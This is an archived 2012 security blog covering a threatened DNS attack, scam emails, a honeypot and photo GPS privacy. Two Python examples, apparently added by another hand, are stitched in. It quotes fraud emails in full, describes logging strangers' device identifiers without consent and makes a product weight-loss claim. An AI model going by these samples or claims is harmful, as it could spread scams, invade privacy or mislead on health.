2.3.13 How to Mitigate Anonymous Internet Shutdown March 31 (2012-03-28 18:40)

In case you haven't heard, Anonymous plans to [1]shutdown the internet March 31 to protest a multitude of issues which I'm not going to bother to get into right now. The plan is to attack all 13 root DNS servers with Denial of Service (DoS) attacks. By shutting down all 13 root DNS servers, a domino effect will be felt throughout the internet and eventually all DNS queries will begin to time out. Their plan is pretty bold, and will require a tremendous number of computer systems attacking at once. While it is unknown if Anonymous' plan can succeed, there are a few things you can do to mitigate this threat from affecting your organization.

1) Don't panic. This shutdown is on a Saturday, so the number of employees this affects will be minimal. If your organization isn't even open on Saturdays, then this won't affect your organization at all.

2) If you are open on Saturday, consider putting one of your local DNS servers in caching mode if it isn't already, and increase the DNS caching time to live (TTL) to 86400 seconds (24 hours). Any commonly used sites should remain cached throughout the attack. It's a good idea to revert to your original settings Monday morning.

3) Finally, if you absolutely must have access to certain websites with static IP addresses, such as business partners or suppliers, consider making available to your on-call support staff a hosts file with critical domain names and IP addresses pre-loaded, so that they can drop this file on any organizational systems which start to have DNS problems. Once again, revert to your original settings Monday morning.

These three simple tips should help keep your organization up and running, should Anonymous actually succeed in taking down one or more root DNS servers. For home users, I would recommend checking your local weekend weather forecast Friday evening. If it's going to be nice out, be ready to go outside for a change, get some exercise and have some fun. If not, consider breaking out some board games for the kids, or find yourself a nice book to read. It's only one day, if it even happens, and it's not the end of the world.
1. http://pastebin.com/GFkQnf6e
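Step 3 above (a pre-loaded hosts file that support staff can drop onto affected machines, then revert on Monday) is easy to get wrong by hand: a typo in an address silently breaks a critical name, and the revert has to remove exactly what was added. The following is an added example, not the blog's own code, that does both with a marker-delimited block. The domain names and addresses in SAMPLE_CRITICAL are constructed placeholders (RFC 5737 documentation ranges), not real partner systems.

```python
"""Hosts-file override for a DNS outage (added example, not the blog's code)."""
import ipaddress
from pathlib import Path

# Markers let the revert step remove exactly the lines that were added.
BEGIN = "# BEGIN dns-outage-override"
END = "# END dns-outage-override"

# Constructed sample: name -> IPv4 literal. Replace with your own critical hosts.
SAMPLE_CRITICAL = {
    "partner.example": "203.0.113.10",
    "supplier.example": "198.51.100.25",
}


def render_override(critical: dict) -> str:
    """Render the marker-delimited block; reject anything that is not an IP literal."""
    lines = [BEGIN]
    for name, ip in sorted(critical.items()):
        ipaddress.ip_address(ip)          # raises ValueError on a typo such as "203.0.113"
        lines.append(f"{ip}\t{name}")
    lines.append(END)
    return "\n".join(lines) + "\n"


def revert_override(hosts_text: str) -> str:
    """Return hosts_text with the block removed; unchanged if no block is present."""
    out, skipping = [], False
    for line in hosts_text.splitlines(keepends=True):
        stripped = line.rstrip("\r\n")
        if stripped == BEGIN:
            skipping = True
        elif stripped == END:
            skipping = False
        elif not skipping:
            out.append(line)
    return "".join(out)


def apply_override(hosts_text: str, critical: dict) -> str:
    """Append the block to hosts_text. Idempotent: an existing block is replaced."""
    base = revert_override(hosts_text)
    if base and not base.endswith("\n"):
        base += "\n"
    return base + render_override(critical)


def update_hosts_file(path: str, critical: dict, revert: bool = False) -> str:
    """Rewrite the hosts file at `path` in place and return its new content.

    On Linux this is /etc/hosts; on Windows it is
    C:\\Windows\\System32\\drivers\\etc\\hosts (administrator rights required).
    """
    p = Path(path)
    text = p.read_text(encoding="utf-8")
    new = revert_override(text) if revert else apply_override(text, critical)
    p.write_text(new, encoding="utf-8")
    return new
```

Run `update_hosts_file("/etc/hosts", SAMPLE_CRITICAL)` on an affected machine and `update_hosts_file("/etc/hosts", SAMPLE_CRITICAL, revert=True)` on Monday. For step 2, a caching resolver such as Unbound has a `cache-min-ttl` option that keeps answers at least that long regardless of the authoritative TTL; it should likewise be reverted afterwards, because it also delays legitimate record changes.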

2.4 April

2.4.1 Why am I in Computer Security? (2012-04-09 13:50)

Ask the U.S. Commerce Department

Should we ever get to the point where the computers we use present more risk than provide value, it will undoubtedly be time to unplug them. I could write a very lengthy article on why I am in the computer security field. But I'm not going to. Instead, I'm going to link to a news article about the U.S. Commerce Department's Economic Development Administration. This is what I want to help prevent from happening. [1]Computer Virus Plunges Government Agency Into Dark Ages
1. http://www.npr.org/blogs/thetwo-way/2012/04/09/150290867/computer-virus-plunges-government-agency-into-dark-ages

2.4.2 Project Beekeeper - A Mobile Honeypot Project (2012-04-09 23:00)

I'm proud to announce my latest research project, Project Beekeeper. In this project I will be creating a mobile hotspot and taking it to public locations, keeping track of how many people connect at each location over a period of time. I won't be scanning them when they connect, simply recording their system/phone name and MAC address, and collecting statistics. I'll be using a rooted HTC T-Mobile G1 running Android 1.6, which is no longer connected to a wireless carrier. This will all be made possible by [1]Barnacle Wifi Tether, a great piece of software which is available on [2]Google Play.
1. http://szym.net/barnacle/
2. https://play.google.com/store/apps/details?id=net.szym.barnacle

2.4.3 Sony BRAVIA TV Datagram Flooding Denial of Service (2012-04-10 15:04)

Here's an interesting vulnerability... Who would have thought you'd need to worry about your TV being subject to an attack?

A vulnerability has been reported in Sony BRAVIA TV, which can be exploited by malicious people to cause a DoS (Denial of Service). Source: [1]Secunia Advisory SA48705
1. http://secunia.com/advisories/48705/

2.4.4 I've been losing about 1 lb per day thanks to @ZipFizzCorp (2012-04-10 18:31)

I've been losing about a pound per day by slightly changing my diet and switching from soda to bottled water plus [1]ZipFizz. First, a little about me. I'm a computer security professional, and rarely have time to leave my desk. I don't exercise nearly as often as I should (barely ever), simply because I don't have the time. For about a month now, I've changed my diet to try to lose weight, and it's working! I recently started tracking my weight, and I'm losing about a pound per day. I'm not going to lie, ZipFizz is not some miracle drug or anything of the sort...I did have to alter my diet as well as switch to ZipFizz.

My diet before ZipFizz: I never have time to eat breakfast in the morning, because I've got to get to work and don't have time. Because of this, I normally eat lunch around 11 am. To keep me going during the day, I drink a lot of caffeine. I was drinking two 20 oz sodas during the work day. That's 550 calories, and 156g of carbohydrates. That's 50% of your daily allowance for carbohydrates for a 2,000 calorie diet! On top of all this, I normally eat a microwave meal at about 400 calories, 41 carbohydrates. I usually have a bag of chips with my meal, so that's 160 more calories and 15g more carbohydrates. Sometimes I'll even eat a mid-afternoon snack, doubling those values. So, totaling all this up, I've consumed BEFORE I go home for dinner: 1270 calories (63.5% of daily allowance for 2,000 calorie diet), 212g carbohydrates (70% of daily allowance for 2,000 calorie diet). Then when I got home, I would eat a large dinner with my wife, drink MORE soda, and greatly exceed the number of calories, carbs, and sugars I should be taking in.

Now: I still don't have time to eat breakfast, so I still eat lunch around 11 am. I switched from 2 sodas per day to 2 ZipFizz with bottled water per day. That's 20 calories, and 4 carbohydrates total. But I've still got the same amount of energy, and can keep going all day long without feeling tired. I switched my microwave dinners to something with less calories, 350 calories instead of 550, but more carbohydrates (55g). I cut out the bag of chips with my meal. Finally, I eliminated my afternoon snack and replaced it with chewable adult multivitamins which look like gummy bears, and taste decent. These have 50 calories, 11g carbohydrates. Update: Added nutritional information for the multivitamins. So now, during the day I'm consuming the following: 420 calories (21% of daily allowance for 2,000 calorie diet), 71g carbohydrates (24% of daily allowance for 2,000 calorie diet). And the best part about it is, I haven't had to change how much I exercise or how much I eat for dinner. The only change I've made in the evenings is switching to diet soda instead of regular. The weight loss has been slow but steady, and I feel healthier. I encourage you to give ZipFizz a try as an alternative to coffee or soda, especially if you need to lose some weight. You probably are questioning if ZipFizz paid me to type this blog post. They didn't. Ask them. I wrote this blog post because like many people in the IT field, I have a weight problem, and I want to do something about it. I want to help others do something about it.

Disclaimer: I'm not a physician, this is not medical advice, and I'm not responsible for what you do with this information. Consult a doctor before making serious changes in your diet.
1. http://www.zipfizz.com/index.html

2.4.5 Warning: Potentially Malicious Unfollow Twitter App (2012-04-12 14:48)

Twitter users have recently begun receiving spam claiming to be an unfollow app capable of telling you who has stopped following you on Twitter. Since this app is being advertised via spam, it should of course be treated as suspect. The spam uses multiple redirects to fool scanners:

First Redirect Destination Analysis: (Clean) [1]https://www.virustotal.com/url/7ad5fc516c4a9a4689de1e5de82c90681bb95f998c2ff1a0bfce180324d44fbb/analysis/1334255656/

Second Redirect Destination Analysis: (Potentially damaging content per Websense Threatseeker) [2]https://www.virustotal.com/url/dbfafb76973527e77be5e8e15f30ea7734b4a6cffed2d403c32fff16c69adf34/analysis/

At the very least, this is most likely a scam to get social networking impressions. Chances are fairly high, however, that this could be malicious software. If you receive any spam advertising this (or any other app), report the account to Twitter and they will deal with it accordingly.
1. https://www.virustotal.com/url/7ad5fc516c4a9a4689de1e5de82c90681bb95f998c2ff1a0bfce180324d44fbb/analysis/1334255656/
2. https://www.virustotal.com/url/dbfafb76973527e77be5e8e15f30ea7734b4a6cffed2d403c32fff16c69adf34/analysis/

2.4.6 What if your hardware was infected with a virus? (2012-04-16 10:54)

It's no longer uncommon to see viruses once again infecting the boot sector of a hard disk, in order to maintain their infection of a system. There have even been reports of viruses infecting the [1]BIOS, capable of maintaining infection after a full hard disk wipe. But what if your actual hardware had an infection permanently programmed in? It's not unheard of for consumer electronics such as [2]digital photo frames to be manufactured and sold with malware installed at the factory. What if the actual hardware design included a piece of malware designed to fail at a certain date/time or even phone home? While the chances of this occurring are unlikely, it's still a possibility. Chances are that if a piece of hardware were modified that significantly, it would most likely be the deliberate action of a well funded organization, with malware rivaling that of Stuxnet or Duqu. This organization would need to do a lot more than just infect a USB stick - the organization would need someone on the inside of the manufacturing process to implement any hardware based malware, and most likely would be government funded. This malware would be well beyond the complexity of Stuxnet or Duqu, as it would be malware written at the physical hardware layer, incorporated into the equipment.

The applications for such a piece of malware are very limited. While espionage would be a likely candidate, it would be ill advised - any malware which would phone home from the physical layer would be detected by network monitoring tools, and the hardware would be taken out of service. Once the physical defect was uncovered by researchers, a bulletin would be issued worldwide to discontinue use of that device. A more likely application of hardware based malware would be sabotage. Deliberately design a device to fail at a specified date/time. Consider this scenario for a minute...what would happen if half the switches running the Internet backbone would fail simultaneously? Communication would be severely crippled. Then apply this one step further to hardware such as digitally controlled water pumps, generators, dam controls... Simultaneous failure of multiple components on a nationwide or global scale could have disastrous consequences.

While the likelihood of this being detected at a manufacturer level is relatively high, thanks to quality control processes, if a hardware based piece of malware were missed by a manufacturer, or intentionally introduced by a manufacturer under direction of its government, once a piece of hardware leaves the factory, hardware based malware would be near impossible to detect until it was too late. Ultimately, this raises the question of how well do you trust your manufacturers? Are you having a local, trusted manufacturer you've dealt with for years build your equipment, or do you outsource your manufacturing to the cheapest supplier overseas who you've never even met face-to-face? In a world where best practices such as configuration management and configuration standardization are becoming key, should a piece of hardware based malware be created, configuration standardization may ultimately be our own downfall. Unfortunately, much like Stuxnet and Duqu, it's no longer a question of if hardware based malware will appear, but how soon...
1. http://news.softpedia.com/news/Mebromi-BIOS-Virus-Out-in-the-Wild-221702.shtml
2. http://www.computerworld.com/s/article/9058638/Best_Buy_sold_infected_digital_picture_frames

2.4.7 Surely this is a legit lottery email and not a scam... (2012-04-18 15:26)

This email just showed up in my inbox...

Subject: .YOUR EM,AIL HAS WON,N
Date: Wed, 18 Apr 2012 20:55:19 +0200

It has finally come to our notice that you have not claimed your winning price. We want to verify if truly you are the owner of the email address that has won the 2012 Microsoft Email lottery draw. Because we have sent the winning notification to your address but you did not write back. If you are the owner of the email address that has won the Email lottery, we advice you claim your winning price as quick as possible to avoid losing it, as the lottery program might come to an end within the next seven days or next week.

Best Regards.
Dr. Clinton W. E. Bateman (Coordinator M.S. Lotto)
Tel: +44-703-184-1863 +441212880874
EMAIL: infomsloto@mslot-agent.info.ms

Surely this is a legitimate email, right? The lottery scam seems to be growing in numbers, and no end appears to be in sight. For those not familiar with it, the recipient is typically asked to submit taxes, transfer fees, etc. Here is an excellent resource on the topic: [1]http://www.fraudaid.com/scamspam/lottery/index.htm Here are the full headers in case anyone is interested...

Received: by 10.112.131.196 with SMTP id oo4csp109311lbb; Wed, 18 Apr 2012 11:58:45 -0700 (PDT)
Received: by 10.68.219.200 with SMTP id pq8mr8566500pbc.55.1334775524668; Wed, 18 Apr 2012 11:58:44 -0700 (PDT)
Return-Path: <tanstoseat@try.lotuslive.com>
Received: from outbound1-nonen.mail.lotuslive.com (outbound1-nonen.mail.lotuslive.com. [8.12.152.102]) by mx.google.com with ESMTPS id l3si28833024pbs.4.2012.04.18.11.58.43 (version=TLSv1/SSLv3 cipher=OTHER); Wed, 18 Apr 2012 11:58:44 -0700 (PDT)
Received-SPF: pass (google.com: domain of tanstoseat@try.lotuslive.com designates 8.12.152.102 as permitted sender) client-ip=8.12.152.102;
Authentication-Results: mx.google.com; spf=pass (google.com: domain of tanstoseat@try.lotuslive.com designates 8.12.152.102 as permitted sender) smtp.mail=tanstoseat@try.lotuslive.com
Received: from c-in3ol01-01.sv2.lotuslive.com (unknown [10.6.31.41]) by c-in3obnd01-03.sv2.lotuslive.com (Postfix) with ESMTP id 07D7F7B2667 for <XXXXXXXXX@gmail.com>; Wed, 18 Apr 2012 18:55:30 +0000 (GMT)
Received: from c-in3ol01-01.sv2.lotuslive.com (unknown [127.0.0.1]) by c-in3ol01-01.sv2.lotuslive.com (Postfix) with ESMTP id D831D6FD01 for <XXXXXXXXX@gmail.com>; Wed, 18 Apr 2012 18:55:29 +0000 (GMT)
Received: from uscl3-no01-ws12.ben.sv2.lotuslive.com (c-in3ws01-06.sv2.lotuslive.com [10.6.31.114]) (sender tanstoseat@try.lotuslive.com) by c-in3ol01-01.sv2.lotuslive.com (LotusLive iNotes outfilter/0.91) with SMTP; Wed, 18 Apr 2012 18:55:26 +0000
Message-ID: <20120418185522.30420.qmail@c-in3ws01-06.sv2.lotuslive.com>
Cc: recipient list not shown: ;
Received: from unknown (HELO smtp.mail.lotuslive.com) (tanstoseat@try.lotuslive.com@31.174.239.199) by uscl3-no01-ws12.fen.sv2.lotuslive.com with SMTP; 18 Apr 2012 18:55:22 -0000
Reply-To: <.a@noreply.com>
From: *Microsoft* Email Loto*2012 <masxdfg@hotmail.com>
Subject: .YOUR EM,AIL HAS WON,N
Date: Wed, 18 Apr 2012 20:55:19 +0200
MIME-Version: 1.0
Content-Type: text/plain; charset=Windows-1251
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-Antivirus: avast! (VPS 120418-1, 18/04/2012), Outbound message
X-Antivirus-Status: Clean
X-CMAE-Score: 0
X-CMAE-Analysis: v=2.0 cv=Drp/CRD+ c=1 sm=1 a=Dyoqhi TatcA:10 a=8uJ5MO MQBgA:10 a=lGr3UWs4Ur8A:10 a=BLceEmwcHowA:10 a=Cfj4BQAnxiAA:10 a=PNUFLNqkAAAA:8 a=fP6YYZurAn-X523HlxEA:9 a=vUkLqrBayiBQqtPNAGEA:7 a=Ft8UYL4EG9YA:10 a=pDc5FA69erMA:10 a=4 OkANz4rm5RFRib:21 a=c pWzpkRV3-DngXB:21 a=WkljmVdYkabdwxfqvArNOQ==:117
x-tagline: tagged

It has finally come to our notice that you have not claimed your winning price. We want to verify if truly you are the owner of the email address that has won the 2012 Microsoft Email lottery draw. Because we have sent the winning notification to your address but you did not write back. If you are the owner of the email address that has won the Email lottery, we advice you claim your winning price as quick as possible to avoid losing it, as the lottery program might come to an end within the next seven days or next week.

Best Regards.
Dr. Clinton W. E. Bateman (Coordinator M.S. Lotto)
Tel: +44-703-184-1863 +441212880874
EMAIL: infomsloto@mslot-agent.info.ms

1. http://www.fraudaid.com/scamspam/lottery/index.htm

2.4.8 The scammers just keep getting dumber... (2012-04-23 16:34)

Got this email today:

Good Day Dearest One Dear !! I am Madam.Sonia Zuru I am a widow being that I lost my husband,my husband was a serving director of the Cocoa exporting board until his death.He was assassinated by the rebels following the political uprising, before his death he made a deposit of Six Million Five Hundred Dollars ( $ 6,500,000.00) here in Ouagadougou Burkina Faso in one of the Security Company,he intended to buy a Cocoa processing Machine with the fund.I want you to help me for us to retrieve this fund and transfer it to your account in your country or any safer place as you will be the beneficiary and recipient of the fund which we will use for joint investment in your country.I have plans to do investment in your country, like real estate and industrial production.This is my reason for writing to you. Please if you are willing to assist me and my only Daughter Linda Zuru, Telephone REMOVED Thanks and best regards . Madam Sonia Zuru

I've never priced a cocoa processing machine, but something tells me over $6 million is a little excessive. I'm also kinda disappointed. $6.5 million is pocket change compared to the scams I used to receive. I know the economy is tough right now, but it's not like these scammers are actually offering real money. Add a few more zeros to that and you might perk my interest.

2.5 May

2.5.1 New Terms of Use - $500 Processing Fee for Comment Spam (2012-05-06 16:17)

Due to an increase in spam, I've had to add a [1]Terms of Use page. In summary, the Terms of Use for this site explicitly state that any unsolicited advertisements within comments agree to a $500 comment processing fee for each link within the comment. Comments which are not unsolicited advertisements are exempt from this processing fee.
1. http://caffeinesecurity.blogspot.com/p/terms-of-use.html

2.5.2 My Letter to a Spammer (2012-05-06 17:00)

I decided to take the time to notify one of the businesses which has been spamming my blog with comments that I'm just not going to take it anymore. Here is the letter in full. Note that the company name is being withheld because I don't want them to get any more web traffic from my blog.

Hello,

This is to notify you that an unsolicited advertisement for your business was recently posted on my blog, Caffeine Security. Please note that as a computer professional, I take spam seriously and it will not be tolerated. Due to a recent increase in spam on my blog, I have implemented a new Terms of Use which I encourage you to review. In short, any future unsolicited advertisements for your business will be subject to a $500 comment processing fee for each link posted. Because your unsolicited advertisement was posted before this Terms of Use was in effect, any pre-existing advertisements are not subject to this processing fee. However, all future unsolicited advertisements will be subject to this processing fee. Third party advertising services and automated applications posting these comments on your behalf are considered your agent, and accept these terms on your behalf. If you do not wish to be subject to this fee in the future, I highly advise you discontinue unsolicited comment advertisements on blogs immediately. If these advertisements are being posted by a 3rd party advertisement service, the recommended course of action is to notify this advertisement service immediately to discontinue unsolicited advertisements.

Thanks,
Ken
Caffeine Security

2.5.3 Hacking Your Digital Camera (2012-05-08 22:55)

Not all hacking is bad. Sometimes hacking can be used to enhance the features of a product, instead of performing malicious actions. One of my hobbies is photography. Today I downloaded the [1]Canon Hack Development Kit (CHDK) for my Canon Powershot S2 IS. After a couple wrong versions, I finally downloaded the correct version for my camera, and was up and running. The way the CHDK works is pretty ingenious. The CHDK software is loaded into your camera's RAM by tricking your camera into thinking it's loading a firmware update. However, instead of loading a firmware update, CHDK is temporarily loaded into memory much like running an application on your computer or phone - it's not loaded into memory the next time you turn off and turn back on your camera. The features enabled with CHDK are pretty amazing. My point and shoot camera now has some features which aren't available on my wife's professional camera, such as motion detection or extended time-lapse photography of up to 64 seconds (some cameras allow up to 30 minute time lapse!). If you have a [2]supported camera I highly encourage you to check it out.
1. http://chdk.wikia.com/wiki/CHDK
2. http://chdk.wikia.com/wiki/FAQ#Q._What_camera_models_are_supported_by_the_CHDK_program.3F

2.5.4 Android for the Paranoid: Fake GPS (2012-05-10 20:23)

This is the first article in a series of articles highlighting applications for security conscious users. Today we're going to take a look at an Android application called Fake GPS. First, why does Fake GPS qualify as a security application? Many Android applications are location aware, meaning the application may not only find out where you are, but also report this information to the developer and advertisers, and possibly even post this information publicly. Another serious issue is that by default Android's camera will embed your GPS location inside your photos. This means when you post a photo online, everyone will know exactly where you are! The solution to this problem is Fake GPS. When combined with the Android feature Mock Location, this application allows you to trick your phone into thinking you're somewhere else.

[1] The above photo appears to have been taken in Phoenix, Arizona.

[2] And this photo appears to have been taken in Florida. How can you see the embedded GPS coordinates? With an [3]EXIF viewer. Here's the info for the first photo: [4]http://regex.info/exif.cgi?dummy=on&imgurl=http%3A%2F%2Fi46.tinypic.com%2Frvaeep.jpg

Fake GPS is very easy to use. Simply use a scrollable/zoomable map and choose where you want the GPS coordinates to be set. You can even go into the advanced options and have the GPS move in a random direction and speed. So, if you're worried about someone tracking your every move with your cell phone, I highly recommend Fake GPS.
1. http://i46.tinypic.com/rvaeep.jpg
2. http://i48.tinypic.com/2whm5o3.jpg
3. http://regex.info/exif.cgi
4. http://regex.info/exif.cgi?dummy=on&imgurl=http%3A%2F%2Fi46.tinypic.com%2Frvaeep.jpg
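The post relies on an online EXIF viewer to show where a photo was taken. As an added example (not code from the blog or from the Fake GPS app), here is the same check done locally with only the standard library: it walks the JPEG's APP1 Exif segment (TIFF header, IFD0, the GPS sub-IFD referenced by tag 0x8825, and GPS tags 1 to 4) to report the embedded coordinates, and it can strip the Exif segment so the location never leaves the phone or laptop. `build_sample_jpeg` constructs a minimal test file whose coordinates are made up; it carries no image data, so it is only for exercising the parser.

```python
"""Read and strip Exif GPS data from a JPEG (added example, not the blog's code)."""
import struct

GPS_IFD_POINTER = 0x8825          # IFD0 tag whose value is the offset of the GPS sub-IFD
EXIF_HEADER = b"Exif\0\0"


def _segments(jpeg: bytes):
    """Yield (offset, marker, length) for each header segment before SOS/EOI."""
    pos = 2                                   # skip SOI (FF D8)
    while pos + 4 <= len(jpeg):
        marker, seglen = struct.unpack(">HH", jpeg[pos:pos + 4])
        if marker in (0xFFDA, 0xFFD9):        # start of scan / end of image
            break
        yield pos, marker, seglen
        pos += 2 + seglen                     # the length field counts itself


def _is_exif(jpeg: bytes, pos: int, marker: int) -> bool:
    return marker == 0xFFE1 and jpeg[pos + 4:pos + 10] == EXIF_HEADER


def _entries(tiff: bytes, e: str, off: int):
    """Yield (tag, type, count, raw 4-byte value-or-offset) for the IFD at `off`."""
    (n,) = struct.unpack(e + "H", tiff[off:off + 2])
    for i in range(n):
        at = off + 2 + 12 * i
        tag, typ, count = struct.unpack(e + "HHI", tiff[at:at + 8])
        yield tag, typ, count, tiff[at + 8:at + 12]


def _dms_to_degrees(dms, ref: str) -> float:
    d, m, s = dms
    deg = d + m / 60 + s / 3600
    return round(-deg if ref in ("S", "W") else deg, 6)


def read_gps(jpeg: bytes):
    """Return (lat, lon) in decimal degrees, or None if no GPS IFD is present."""
    for pos, marker, seglen in _segments(jpeg):
        if not _is_exif(jpeg, pos, marker):
            continue
        tiff = jpeg[pos + 10:pos + 2 + seglen]   # TIFF structure follows the 6-byte header
        e = ">" if tiff[:2] == b"MM" else "<"     # byte order: MM = big-endian, II = little
        (ifd0,) = struct.unpack(e + "I", tiff[4:8])
        gps_off = None
        for tag, typ, count, raw in _entries(tiff, e, ifd0):
            if tag == GPS_IFD_POINTER:
                (gps_off,) = struct.unpack(e + "I", raw)
        if gps_off is None:
            return None
        fields = {}
        for tag, typ, count, raw in _entries(tiff, e, gps_off):
            if typ == 2 and count <= 4:           # ASCII stored inline, e.g. b"N\0"
                fields[tag] = raw[:count].rstrip(b"\0").decode("ascii")
            elif typ == 5 and count == 3:         # three RATIONALs: degrees, minutes, seconds
                (off,) = struct.unpack(e + "I", raw)
                v = struct.unpack(e + "6I", tiff[off:off + 24])
                fields[tag] = [v[i] / (v[i + 1] or 1) for i in range(0, 6, 2)]
        if all(t in fields for t in (1, 2, 3, 4)):  # LatRef, Lat, LonRef, Lon
            return (_dms_to_degrees(fields[2], fields[1]),
                    _dms_to_degrees(fields[4], fields[3]))
        return None
    return None


def strip_exif(jpeg: bytes) -> bytes:
    """Return a copy of the file with every Exif APP1 segment removed."""
    out, end = bytearray(jpeg[:2]), 2
    for pos, marker, seglen in _segments(jpeg):
        end = pos + 2 + seglen
        if not _is_exif(jpeg, pos, marker):
            out += jpeg[pos:end]
    out += jpeg[end:]                         # scan data and EOI follow unchanged
    return bytes(out)


def build_sample_jpeg(lat_dms, lat_ref, lon_dms, lon_ref) -> bytes:
    """Constructed test input: SOI + Exif APP1 (big-endian TIFF) + EOI, no image data."""
    def entry(tag, typ, count, val):
        return struct.pack(">HHI", tag, typ, count) + val

    def rationals(dms):
        d, m, s = dms
        return struct.pack(">6I", d, 1, m, 1, round(s * 100), 100)

    # Layout (offsets from the TIFF header): IFD0 at 8, GPS IFD at 26, rationals at 80 and 104.
    ifd0 = struct.pack(">H", 1) + entry(GPS_IFD_POINTER, 4, 1, struct.pack(">I", 26)) + b"\0\0\0\0"
    gps = (struct.pack(">H", 4)
           + entry(1, 2, 2, lat_ref.encode() + b"\0\0\0")
           + entry(2, 5, 3, struct.pack(">I", 80))
           + entry(3, 2, 2, lon_ref.encode() + b"\0\0\0")
           + entry(4, 5, 3, struct.pack(">I", 104))
           + b"\0\0\0\0")
    tiff = b"MM\0\x2a" + struct.pack(">I", 8) + ifd0 + gps + rationals(lat_dms) + rationals(lon_dms)
    app1 = EXIF_HEADER + tiff
    return b"\xff\xd8\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xff\xd9"
```

`read_gps(open("photo.jpg", "rb").read())` on a real photo returns the coordinates the online viewer would show (or None); writing `strip_exif(data)` back out removes the location along with the rest of the Exif block, which is the safer default before uploading anywhere.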

2.5.5 Do you test your Antivirus updates before deployment? (2012-05-15 12:59)

If your system uses Avira Antivirus, you probably won't be reading this post today. According to ZDNet, an Avira Antivirus update today crippled [1]millions of computer systems. This isn't the first time an Antivirus update has crippled Windows systems. Back in 2010 McAfee pushed out a DAT update which sent computers into [2]endless reboot cycles. What can you do to help protect your organization against these disasters? It's simple...test your software updates. Even antivirus definition updates can cause catastrophic failures across your enterprise... And just in case something slips through the cracks...have a backup plan. Are you prepared for a worst case scenario where every active computer system in your organization is unusable? How do you keep your organization running? How do you recover from something that widespread in a timely manner, and restore normal business functionality? Keep these questions in mind, and as we always said in Boy Scouts...Be Prepared.
1. http://www.zdnet.com/blog/security/avira-antivirus-update-cripples-millions-of-windows-pcs/12129
2. http://www.switched.com/2010/04/21/mcafee-update-sends-windows-xp-machines-into-endless-reboot/

2.5.6 Warning: CaffeineSecurity dotcom is not mine! (2012-05-23 09:22)

Just a warning to everyone, there was a recent registration of CaffeineSecurity.com. This site is NOT me. The domain was registered by proxy, so it's hard to tell who might actually own it. Domain registration info follows:

domain: caffeinesecurity.com
created: 21-May-2012
last-changed: 21-May-2012
registration-expiration: 21-May-2013
nserver: zoe.ns.cloudflare.com 173.245.58.149
nserver: dan.ns.cloudflare.com 173.245.59.108
status: CLIENT-TRANSFER-PROHIBITED
registrant-firstname: Oneandone
registrant-lastname: Private Registration
registrant-organization: 1&1 Internet, Inc. - http://1and1.com/contact
registrant-street1: 701 Lee Road, Suite 300
registrant-street2: ATTN: caffeinesecurity.com
registrant-pcode: 19087
registrant-state: PA
registrant-city: Chesterbrook
registrant-ccode: US
registrant-phone: +1.8772064254
registrant-email: (removed to prevent spam)
admin-c-firstname: Oneandone
admin-c-lastname: Private Registration
admin-c-organization: 1&1 Internet, Inc. - http://1and1.com/contact
admin-c-street1: 701 Lee Road, Suite 300
admin-c-street2: ATTN: caffeinesecurity.com
admin-c-pcode: 19087
admin-c-state: PA
admin-c-city: Chesterbrook
admin-c-ccode: US
admin-c-phone: +1.8772064254
admin-c-email: (removed to prevent spam)
tech-c-firstname: Oneandone
tech-c-lastname: Private Registration
tech-c-organization: 1&1 Internet, Inc. - http://1and1.com/contact
tech-c-street1: 701 Lee Road, Suite 300
tech-c-street2: ATTN: caffeinesecurity.com
tech-c-pcode: 19087
tech-c-state: PA
tech-c-city: Chesterbrook
tech-c-ccode: US
tech-c-phone: +1.8772064254
tech-c-email: (removed to prevent spam)
bill-c-firstname: Oneandone
bill-c-lastname: Private Registration
bill-c-organization: 1&1 Internet, Inc. - http://1and1.com/contact
bill-c-street1: 701 Lee Road, Suite 300
bill-c-street2: ATTN: caffeinesecurity.com
bill-c-pcode: 19087
bill-c-state: PA
bill-c-city: Chesterbrook
bill-c-ccode: US
bill-c-phone: +1.8772064254
bill-c-email: (removed to prevent spam)

2.5.7 Keep an eye out for fake Yahoo Browser Plugins! (2012-05-24 11:07)

According to Sophos, Yahoo! recently released a browser search plugin called Yahoo! Axis for Chrome, Firefox, Safari, and IE 9. During this release, Yahoo! accidentally [1]included the private key used to sign the packages inside the Chrome extension package. This means anyone who downloaded the package now has Yahoo!'s private signing key and could make their own copy of the plugin and [2]insert malicious code. As a safeguard, if you decide to use Yahoo! Axis, make sure you download the plugin only from Yahoo's [3]official download site.

1. http://nakedsecurity.sophos.com/2012/05/24/yahoo-leaks-its-own-private-key-via-new-axis-chrome-extension/
2. https://nikcub.appspot.com/posts/yahoo-axis-chrome-extension-leaks-private-certificate-file
3. http://axis.yahoo.com/

2.6 June

2.6.1 Stuxnet not the first Nation-Sponsored Cyber Attack (2012-06-04 11:52)

Very recently it was revealed that the famous malware Stuxnet was created as a [1]joint operation by the U.S. and Israel. It's important to point out that this isn't really new, as nations have been waging so-called cyber warfare for years now. Make no mistake, there are plenty of other pieces of malware in existence which have been designed for espionage or sabotage. One such piece of malware may be the [2]Hutizu malware, which was found on the Caffeine Security honeypot earlier this year. And this definitely isn't the first time a nation has attacked another through cyber warfare...just ask the country [3]Georgia. While many will condemn cyber warfare actions, I personally applaud them. After all, if a cyber weapon such as Stuxnet [4]can be used instead of real weapons, resulting in no loss of human life, then isn't that better than sending in planes and tanks? What will be interesting is, now that the U.S. and Israel have openly entered the cyber warfare arena, how many nations will begin open cyber warfare against them? There is a Chinese curse: "May you live in interesting times." For those of us in the cyber security field, I have a feeling that curse is now upon us.
1. http://phys.org/news/2012-06-stuxnet-decoded.html
2. http://caffeinesecurity.blogspot.com/search/label/Hutizu
3. http://bits.blogs.nytimes.com/2008/08/11/georgia-takes-a-beating-in-the-cyberwar-with-russia/?ref=business
4. http://www.internetevolution.com/author.asp?section_id=771&doc_id=245072&f_src=internetevolution_gnews

2.6.2 And you Thought your Password Requirements Were Bad... (2012-06-04 13:21)

Apparently everything is bigger in Texas, including the ridiculousness of password requirements... From [1]http://portal.cs.oag.state.tx.us/OAGStaticContent/portal/login/help/ChangePassword.htm

Remember that the new password must fulfill these requirements:
1. The password must be exactly 8 characters long.
2. It must contain at least one letter, one number, and one special character.
3. The only special characters allowed are: @ # $
4. A special character must not be located in the first or last position.
5. Two of the same characters sitting next to each other are considered to be a set. No sets are allowed.
6. Avoid using names, such as your name, user ID, or the name of your company or employer.
